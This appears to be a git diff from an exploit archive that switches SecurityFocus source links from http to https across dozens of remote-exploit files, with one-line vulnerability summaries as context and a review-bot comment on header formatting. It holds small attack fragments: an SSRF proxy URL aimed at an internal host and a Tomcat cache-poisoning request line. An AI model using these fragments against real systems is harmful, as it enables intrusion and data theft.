b/exploits/multiple/remote/35570.txt index 63764fedc..dff02865e 100644 --- a/exploits/multiple/remote/35570.txt 
+++ b/exploits/multiple/remote/35570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47177/info +source: https://www.securityfocus.com/bid/47177/info python-feedparser is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/35638.txt b/exploits/multiple/remote/35638.txt index ca624ddb9..20a40b998 100644 --- a/exploits/multiple/remote/35638.txt +++ b/exploits/multiple/remote/35638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47479/info +source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/multiple/remote/35639.txt b/exploits/multiple/remote/35639.txt index c16d55d31..b8aa8764a 100644 --- a/exploits/multiple/remote/35639.txt +++ b/exploits/multiple/remote/35639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47479/info +source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/multiple/remote/35640.txt b/exploits/multiple/remote/35640.txt index 73ce5b1c1..11a257a92 100644 --- a/exploits/multiple/remote/35640.txt +++ b/exploits/multiple/remote/35640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47479/info +source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/multiple/remote/35641.txt b/exploits/multiple/remote/35641.txt index 328afd615..6d86aced7 100644 --- a/exploits/multiple/remote/35641.txt +++ b/exploits/multiple/remote/35641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47479/info +source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. 
diff --git a/exploits/multiple/remote/35642.txt b/exploits/multiple/remote/35642.txt index a983246e4..c851fdd72 100644 --- a/exploits/multiple/remote/35642.txt +++ b/exploits/multiple/remote/35642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47479/info +source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/multiple/remote/35685.txt b/exploits/multiple/remote/35685.txt index b34fab938..879c0cea4 100644 --- a/exploits/multiple/remote/35685.txt +++ b/exploits/multiple/remote/35685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47676/info +source: https://www.securityfocus.com/bid/47676/info Asterisk is prone to a user-enumeration weakness. diff --git a/exploits/multiple/remote/35703.py b/exploits/multiple/remote/35703.py index 6b3b96598..f6ed5fb4f 100755 --- a/exploits/multiple/remote/35703.py +++ b/exploits/multiple/remote/35703.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47710/info +source: https://www.securityfocus.com/bid/47710/info sipdroid is prone to a user-enumeration weakness. diff --git a/exploits/multiple/remote/35729.txt b/exploits/multiple/remote/35729.txt index 677669e02..c11fc910d 100644 --- a/exploits/multiple/remote/35729.txt +++ b/exploits/multiple/remote/35729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47780/info +source: https://www.securityfocus.com/bid/47780/info Imperva SecureSphere is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/35735.txt b/exploits/multiple/remote/35735.txt index 8bb6d3a36..b6c6e3989 100644 --- a/exploits/multiple/remote/35735.txt +++ b/exploits/multiple/remote/35735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47784/info +source: https://www.securityfocus.com/bid/47784/info Apache Struts is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. 
diff --git a/exploits/multiple/remote/35790.py b/exploits/multiple/remote/35790.py index 8e0f421b0..3116ed834 100755 --- a/exploits/multiple/remote/35790.py +++ b/exploits/multiple/remote/35790.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47952/info +source: https://www.securityfocus.com/bid/47952/info Lumension Security Lumension Device Control (formerly Sanctuary) is prone to a memory-corruption vulnerability. diff --git a/exploits/multiple/remote/35792.txt b/exploits/multiple/remote/35792.txt index a7d0deb73..de5493729 100644 --- a/exploits/multiple/remote/35792.txt +++ b/exploits/multiple/remote/35792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47957/info +source: https://www.securityfocus.com/bid/47957/info Gadu-Gadu Instant Messenger is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/35805.txt b/exploits/multiple/remote/35805.txt index 6de1cee62..72c25e3e0 100644 --- a/exploits/multiple/remote/35805.txt +++ b/exploits/multiple/remote/35805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48030/info +source: https://www.securityfocus.com/bid/48030/info Gadu-Gadu is prone to a remote code-execution vulnerability. diff --git a/exploits/multiple/remote/35818.txt b/exploits/multiple/remote/35818.txt index fa644ff53..e17ff6b36 100644 --- a/exploits/multiple/remote/35818.txt +++ b/exploits/multiple/remote/35818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48087/info +source: https://www.securityfocus.com/bid/48087/info Nagios is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/35892.txt b/exploits/multiple/remote/35892.txt index e77b04472..2bffc96d9 100644 --- a/exploits/multiple/remote/35892.txt +++ b/exploits/multiple/remote/35892.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48466/info +source: https://www.securityfocus.com/bid/48466/info MySQLDriverCS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/multiple/remote/35898.php b/exploits/multiple/remote/35898.php index 86cb094db..aecfda6ca 100644 --- a/exploits/multiple/remote/35898.php +++ b/exploits/multiple/remote/35898.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48484/info +source: https://www.securityfocus.com/bid/48484/info Atlassian JIRA is prone to a security bypass vulnerability. diff --git a/exploits/multiple/remote/35918.c b/exploits/multiple/remote/35918.c index 9384cf259..d05eeafde 100644 --- a/exploits/multiple/remote/35918.c +++ b/exploits/multiple/remote/35918.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48514/info +// source: https://www.securityfocus.com/bid/48514/info IBM DB2 is prone to a vulnerability that lets attackers execute arbitrary code. diff --git a/exploits/multiple/remote/36004.txt b/exploits/multiple/remote/36004.txt index b2f94f84c..aaea86020 100644 --- a/exploits/multiple/remote/36004.txt +++ b/exploits/multiple/remote/36004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48951/info +source: https://www.securityfocus.com/bid/48951/info Skype is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/remote/36006.java b/exploits/multiple/remote/36006.java index f48f24711..945e0b7de 100644 --- a/exploits/multiple/remote/36006.java +++ b/exploits/multiple/remote/36006.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48954/info +source: https://www.securityfocus.com/bid/48954/info Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox. 
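Review bot: in the 36006.java hunk, the rewritten `source:` line stays as bare text on line 1 of a Java file, while the 35918.c hunk just above gives the same line a `// ` prefix, so the patch treats source files inconsistently. Either comment the header here as well or keep 35918.c a pure URL change and do the commenting in a separate commit. In 35918.c the `// ` also covers only the URL line, and the context line "IBM DB2 is prone to ..." remains uncommented. Wrapping the whole header in a block comment, as the 33877.c hunk does with `/*`, would cover both lines.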
diff --git a/exploits/multiple/remote/36013.txt b/exploits/multiple/remote/36013.txt index 4f6d3ecd9..d55af5b43 100644 --- a/exploits/multiple/remote/36013.txt +++ b/exploits/multiple/remote/36013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48982/info +source: https://www.securityfocus.com/bid/48982/info foomatic-gui is prone to a remote arbitrary shell-command-execution vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/36016.txt b/exploits/multiple/remote/36016.txt index 4447bfa5e..51b4e4955 100644 --- a/exploits/multiple/remote/36016.txt +++ b/exploits/multiple/remote/36016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49007/info +source: https://www.securityfocus.com/bid/49007/info Xpdf is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization. diff --git a/exploits/multiple/remote/36130.txt b/exploits/multiple/remote/36130.txt index 478846c9b..76bc113b9 100644 --- a/exploits/multiple/remote/36130.txt +++ b/exploits/multiple/remote/36130.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49535/info +source: https://www.securityfocus.com/bid/49535/info Spring Security is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sufficiently sanitize input. diff --git a/exploits/multiple/remote/36238.txt b/exploits/multiple/remote/36238.txt index f2be68954..86d8afe2e 100644 --- a/exploits/multiple/remote/36238.txt +++ b/exploits/multiple/remote/36238.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50168/info +source: https://www.securityfocus.com/bid/50168/info Multiple Toshiba e-Studio devices are prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/36246.txt b/exploits/multiple/remote/36246.txt index 3514df4e3..5bcbc0033 100644 --- a/exploits/multiple/remote/36246.txt 
+++ b/exploits/multiple/remote/36246.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50296/info +source: https://www.securityfocus.com/bid/50296/info Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/36426.txt b/exploits/multiple/remote/36426.txt index adb277590..2789b50e0 100644 --- a/exploits/multiple/remote/36426.txt +++ b/exploits/multiple/remote/36426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50940/info +source: https://www.securityfocus.com/bid/50940/info Apache Struts is prone to a security-bypass vulnerability that allows session tampering. diff --git a/exploits/multiple/remote/36537.txt b/exploits/multiple/remote/36537.txt index 121a87308..6c6149b7f 100644 --- a/exploits/multiple/remote/36537.txt +++ b/exploits/multiple/remote/36537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51337/info +source: https://www.securityfocus.com/bid/51337/info SonicWall AntiSpam & EMail is prone to a cross-site scripting vulnerability, a URI-redirection vulnerability, and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/36681.txt b/exploits/multiple/remote/36681.txt index b95bf69b7..ec2c3e7de 100644 --- a/exploits/multiple/remote/36681.txt +++ b/exploits/multiple/remote/36681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51939/info +source: https://www.securityfocus.com/bid/51939/info Apache MyFaces is prone to a remote information-disclosure vulnerability. diff --git a/exploits/multiple/remote/37081.py b/exploits/multiple/remote/37081.py index e56fe8b67..c29d567b8 100755 --- a/exploits/multiple/remote/37081.py +++ b/exploits/multiple/remote/37081.py 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53015/info +source: https://www.securityfocus.com/bid/53015/info McAfee Web Gateway is prone to a security-bypass vulnerability because it fails to properly enforce filtering rules. diff --git a/exploits/multiple/remote/37647.txt b/exploits/multiple/remote/37647.txt index 02c5359d6..edb6fa8df 100644 --- a/exploits/multiple/remote/37647.txt +++ b/exploits/multiple/remote/37647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55165/info +source: https://www.securityfocus.com/bid/55165/info Apache Struts2 is prone to a remote-code-execution vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/37671.txt b/exploits/multiple/remote/37671.txt index 3b07e6b58..7a4c513a0 100644 --- a/exploits/multiple/remote/37671.txt +++ b/exploits/multiple/remote/37671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55194/info +source: https://www.securityfocus.com/bid/55194/info Websense Content Gateway is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/37900.txt b/exploits/multiple/remote/37900.txt index bbad9a07f..846cf045b 100644 --- a/exploits/multiple/remote/37900.txt +++ b/exploits/multiple/remote/37900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55740/info +source: https://www.securityfocus.com/bid/55740/info IBM Lotus Notes Traveler is prone to a URI-redirection vulnerability, multiple HTML-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/remote/37947.txt b/exploits/multiple/remote/37947.txt index 83ce210ef..e7f1da73c 100644 --- a/exploits/multiple/remote/37947.txt +++ b/exploits/multiple/remote/37947.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55946/info +source: https://www.securityfocus.com/bid/55946/info LiteSpeed Web Server is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/multiple/remote/38049.txt b/exploits/multiple/remote/38049.txt index 2917db8ec..893deb5ca 100644 --- a/exploits/multiple/remote/38049.txt +++ b/exploits/multiple/remote/38049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56662/info +source: https://www.securityfocus.com/bid/56662/info Greenstone is prone to the following security vulnerabilities: diff --git a/exploits/multiple/remote/38179.txt b/exploits/multiple/remote/38179.txt index 8749caf3e..475f3610b 100644 --- a/exploits/multiple/remote/38179.txt +++ b/exploits/multiple/remote/38179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57212/info +source: https://www.securityfocus.com/bid/57212/info Dell OpenManage Server Administrator is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38230.txt b/exploits/multiple/remote/38230.txt index 0a873003d..75635ee55 100644 --- a/exploits/multiple/remote/38230.txt +++ b/exploits/multiple/remote/38230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57463/info +source: https://www.securityfocus.com/bid/57463/info Apache OFBiz is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38248.txt b/exploits/multiple/remote/38248.txt index 75d036015..6b2f9a30b 100644 --- a/exploits/multiple/remote/38248.txt +++ b/exploits/multiple/remote/38248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57579/info +source: https://www.securityfocus.com/bid/57579/info Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerability. 
diff --git a/exploits/multiple/remote/38250.html b/exploits/multiple/remote/38250.html index 5de6bb609..64d51b643 100644 --- a/exploits/multiple/remote/38250.html +++ b/exploits/multiple/remote/38250.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57657/info +source: https://www.securityfocus.com/bid/57657/info Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities. diff --git a/exploits/multiple/remote/38313.html b/exploits/multiple/remote/38313.html index 05a4fcbf8..10252daee 100644 --- a/exploits/multiple/remote/38313.html +++ b/exploits/multiple/remote/38313.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57949/info +source: https://www.securityfocus.com/bid/57949/info The Dell SonicWALL Scrutinizer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38368.txt b/exploits/multiple/remote/38368.txt index 5bbf3b325..789038eb8 100644 --- a/exploits/multiple/remote/38368.txt +++ b/exploits/multiple/remote/38368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58401/info +source: https://www.securityfocus.com/bid/58401/info McAfee Vulnerability Manager is prone to a cross-site scripting vulnerability. diff --git a/exploits/multiple/remote/38387.txt b/exploits/multiple/remote/38387.txt index f06719010..e955c87d6 100644 --- a/exploits/multiple/remote/38387.txt +++ b/exploits/multiple/remote/38387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58450/info +source: https://www.securityfocus.com/bid/58450/info fastreader is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/38412.txt b/exploits/multiple/remote/38412.txt index 0b84257a9..5c19c8c96 100644 --- a/exploits/multiple/remote/38412.txt +++ b/exploits/multiple/remote/38412.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58715/info +source: https://www.securityfocus.com/bid/58715/info IBM Lotus Domino is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38521.c b/exploits/multiple/remote/38521.c index 363067c4f..02acc8b8d 100644 --- a/exploits/multiple/remote/38521.c +++ b/exploits/multiple/remote/38521.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/60004/info +source: https://www.securityfocus.com/bid/60004/info The RRDtool module for Python is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38549.txt b/exploits/multiple/remote/38549.txt index ab4a8ce12..02f0c09ed 100644 --- a/exploits/multiple/remote/38549.txt +++ b/exploits/multiple/remote/38549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60345/info +source: https://www.securityfocus.com/bid/60345/info Apache Struts is prone to a remote OGNL expression injection vulnerability. diff --git a/exploits/multiple/remote/38587.txt b/exploits/multiple/remote/38587.txt index 0e6ebb6bc..213527ee3 100644 --- a/exploits/multiple/remote/38587.txt +++ b/exploits/multiple/remote/38587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60569/info +source: https://www.securityfocus.com/bid/60569/info The Mandril Security plugin for Monkey HTTP Daemon is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/38597.txt b/exploits/multiple/remote/38597.txt index 837b3f8aa..d6f6a7a4e 100644 --- a/exploits/multiple/remote/38597.txt +++ b/exploits/multiple/remote/38597.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60818/info +source: https://www.securityfocus.com/bid/60818/info Motion is prone to multiple security vulnerabilities including multiple buffer-overflow vulnerabilities, a cross-site scripting vulnerability and a cross-site request-forgery vulnerability. diff --git a/exploits/multiple/remote/38633.pl b/exploits/multiple/remote/38633.pl index ca900ae36..0eb71b9a2 100755 --- a/exploits/multiple/remote/38633.pl +++ b/exploits/multiple/remote/38633.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61076/info +source: https://www.securityfocus.com/bid/61076/info Intelligent Platform Management Interface is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/38636.txt b/exploits/multiple/remote/38636.txt index ab494178b..dad574a15 100644 --- a/exploits/multiple/remote/38636.txt +++ b/exploits/multiple/remote/38636.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61090/info +source: https://www.securityfocus.com/bid/61090/info Cryptocat is prone to an information disclosure vulnerability. diff --git a/exploits/multiple/remote/38637.txt b/exploits/multiple/remote/38637.txt index f76f6339b..916458fff 100644 --- a/exploits/multiple/remote/38637.txt +++ b/exploits/multiple/remote/38637.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61093/info +source: https://www.securityfocus.com/bid/61093/info Cryptocat is prone to an arbitrary script-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38666.txt b/exploits/multiple/remote/38666.txt index e72f99c58..ebedccfa7 100644 --- a/exploits/multiple/remote/38666.txt +++ b/exploits/multiple/remote/38666.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61196/info +source: https://www.securityfocus.com/bid/61196/info Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38669.txt b/exploits/multiple/remote/38669.txt index 24ef9b838..8d3ff441c 100644 --- a/exploits/multiple/remote/38669.txt +++ b/exploits/multiple/remote/38669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61309/info +source: https://www.securityfocus.com/bid/61309/info MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38766.java b/exploits/multiple/remote/38766.java index 05e43c2a5..203a37f71 100644 --- a/exploits/multiple/remote/38766.java +++ b/exploits/multiple/remote/38766.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/62480/info +source: https://www.securityfocus.com/bid/62480/info Mozilla Firefox is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/38802.txt b/exploits/multiple/remote/38802.txt index d9c9fd64c..bc6f37e47 100644 --- a/exploits/multiple/remote/38802.txt +++ b/exploits/multiple/remote/38802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63052/info +source: https://www.securityfocus.com/bid/63052/info Oracle JavaServer Faces is prone to multiple directory-traversal vulnerabilities. diff --git a/exploits/multiple/remote/38805.txt b/exploits/multiple/remote/38805.txt index 5be64db06..7a3109090 100644 --- a/exploits/multiple/remote/38805.txt +++ b/exploits/multiple/remote/38805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63193/info +source: https://www.securityfocus.com/bid/63193/info SAP Sybase Adaptive Server Enterprise is prone to an information-disclosure vulnerability. 
diff --git a/exploits/multiple/remote/38812.txt b/exploits/multiple/remote/38812.txt index 37cb82a32..e2bf21cb2 100644 --- a/exploits/multiple/remote/38812.txt +++ b/exploits/multiple/remote/38812.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63259/info +source: https://www.securityfocus.com/bid/63259/info DELL Quest One Password Manager is prone to a security bypass vulnerability. diff --git a/exploits/multiple/remote/38813.txt b/exploits/multiple/remote/38813.txt index fb832f796..1192658df 100644 --- a/exploits/multiple/remote/38813.txt +++ b/exploits/multiple/remote/38813.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63260/info +source: https://www.securityfocus.com/bid/63260/info Apache Shindig is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/38818.xml b/exploits/multiple/remote/38818.xml index 6ab4f1d06..ee2216638 100644 --- a/exploits/multiple/remote/38818.xml +++ b/exploits/multiple/remote/38818.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63431/info +source: https://www.securityfocus.com/bid/63431/info Openbravo ERP is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/38825.xml b/exploits/multiple/remote/38825.xml index 18b626966..6c2384fe2 100644 --- a/exploits/multiple/remote/38825.xml +++ b/exploits/multiple/remote/38825.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63719/info +source: https://www.securityfocus.com/bid/63719/info IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability due to an error when parsing XML external entities. diff --git a/exploits/multiple/remote/38845.txt b/exploits/multiple/remote/38845.txt index 1cecaf2e8..45521a08c 100644 --- a/exploits/multiple/remote/38845.txt +++ b/exploits/multiple/remote/38845.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63805/info +source: https://www.securityfocus.com/bid/63805/info SKIDATA Freemotion.Gate is prone to multiple remote command-execution vulnerabilities. diff --git a/exploits/multiple/remote/38846.txt b/exploits/multiple/remote/38846.txt index 88cab5492..b9630d3d7 100644 --- a/exploits/multiple/remote/38846.txt +++ b/exploits/multiple/remote/38846.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63814/info +source: https://www.securityfocus.com/bid/63814/info nginx is prone to a remote security-bypass vulnerability. diff --git a/exploits/multiple/remote/39018.txt b/exploits/multiple/remote/39018.txt index 1367806a7..958c1d8c3 100644 --- a/exploits/multiple/remote/39018.txt +++ b/exploits/multiple/remote/39018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64836/info +source: https://www.securityfocus.com/bid/64836/info Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management. diff --git a/exploits/multiple/remote/39104.py b/exploits/multiple/remote/39104.py index 7a6e49ddc..0cb8e3494 100755 --- a/exploits/multiple/remote/39104.py +++ b/exploits/multiple/remote/39104.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65675/info +source: https://www.securityfocus.com/bid/65675/info Catia is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. diff --git a/exploits/multiple/remote/39115.py b/exploits/multiple/remote/39115.py index 4b9805882..23a97a11d 100755 --- a/exploits/multiple/remote/39115.py +++ b/exploits/multiple/remote/39115.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66149/info +source: https://www.securityfocus.com/bid/66149/info ET - Chat is prone to a security bypass vulnerability. diff --git a/exploits/multiple/remote/39175.py b/exploits/multiple/remote/39175.py index 88106f769..03ea92178 100755 
--- a/exploits/multiple/remote/39175.py +++ b/exploits/multiple/remote/39175.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67271/info +source: https://www.securityfocus.com/bid/67271/info AssistMyTeam Team Helpdesk is prone to multiple information-disclosure vulnerabilities. diff --git a/exploits/multiple/remote/39186.pl b/exploits/multiple/remote/39186.pl index ad3819b38..e1c871146 100755 --- a/exploits/multiple/remote/39186.pl +++ b/exploits/multiple/remote/39186.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67438/info +source: https://www.securityfocus.com/bid/67438/info UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability. diff --git a/exploits/multiple/remote/39205.txt b/exploits/multiple/remote/39205.txt index 12acf1385..4f10b4037 100644 --- a/exploits/multiple/remote/39205.txt +++ b/exploits/multiple/remote/39205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67676/info +source: https://www.securityfocus.com/bid/67676/info Castor Library is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/39222.txt b/exploits/multiple/remote/39222.txt index 56b88168e..b94855cdc 100644 --- a/exploits/multiple/remote/39222.txt +++ b/exploits/multiple/remote/39222.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/68117/info +source: https://www.securityfocus.com/bid/68117/info Foreman is prone to a remote command-injection vulnerability. diff --git a/exploits/multiple/remote/39258.txt b/exploits/multiple/remote/39258.txt index 6ae4e3e42..0ca0c4c3f 100644 --- a/exploits/multiple/remote/39258.txt +++ b/exploits/multiple/remote/39258.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/68/info +source: https://www.securityfocus.com/bid/68/info http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info diff --git a/exploits/multiple/remote/39259.txt b/exploits/multiple/remote/39259.txt index ce7396bce..9484605bb 100644 
--- a/exploits/multiple/remote/39259.txt +++ b/exploits/multiple/remote/39259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/68/info +source: https://www.securityfocus.com/bid/68/info http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info diff --git a/exploits/multiple/remote/39292.pl b/exploits/multiple/remote/39292.pl index d7f2fe00b..307678013 100755 --- a/exploits/multiple/remote/39292.pl +++ b/exploits/multiple/remote/39292.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69390/info +source: https://www.securityfocus.com/bid/69390/info Grand MA 300 is prone to multiple security weaknesses. diff --git a/exploits/multiple/remote/39293.pl b/exploits/multiple/remote/39293.pl index 757acae6e..f1d1bd54c 100755 --- a/exploits/multiple/remote/39293.pl +++ b/exploits/multiple/remote/39293.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69390/info +source: https://www.securityfocus.com/bid/69390/info Grand MA 300 is prone to multiple security weaknesses. diff --git a/exploits/multiple/remote/39295.js b/exploits/multiple/remote/39295.js index 9ebad1369..c03958f34 100644 --- a/exploits/multiple/remote/39295.js +++ b/exploits/multiple/remote/39295.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69525/info +source: https://www.securityfocus.com/bid/69525/info Mozilla Firefox and Thunderbird are prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/39318.txt b/exploits/multiple/remote/39318.txt index c4a3cf37d..065102e59 100644 --- a/exploits/multiple/remote/39318.txt +++ b/exploits/multiple/remote/39318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69849/info +source: https://www.securityfocus.com/bid/69849/info Laravel is prone to a security weakness due to pseudo password hash collision. diff --git a/exploits/multiple/remote/41783.txt b/exploits/multiple/remote/41783.txt index a1277fb22..5bd40627a 100644 
--- a/exploits/multiple/remote/41783.txt +++ b/exploits/multiple/remote/41783.txt @@ -7,7 +7,7 @@ # Contact: transform2secure@gmail.com -Source: http://www.securityfocus.com/bid/94461/info +Source: https://www.securityfocus.com/bid/94461/info 1) Description: Apache Tomcat is prone to a security-bypass vulnerability. @@ -22,7 +22,7 @@ into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own. -http://www.securityfocus.com/bid/94461/discuss +https://www.securityfocus.com/bid/94461/discuss 2) Exploit: GET /?{{%25}}cake\=1 HTTP/1.1 diff --git a/exploits/multiple/remote/46513.java b/exploits/multiple/remote/46513.java new file mode 100644 index 000000000..97cb07a99 --- /dev/null +++ b/exploits/multiple/remote/46513.java 
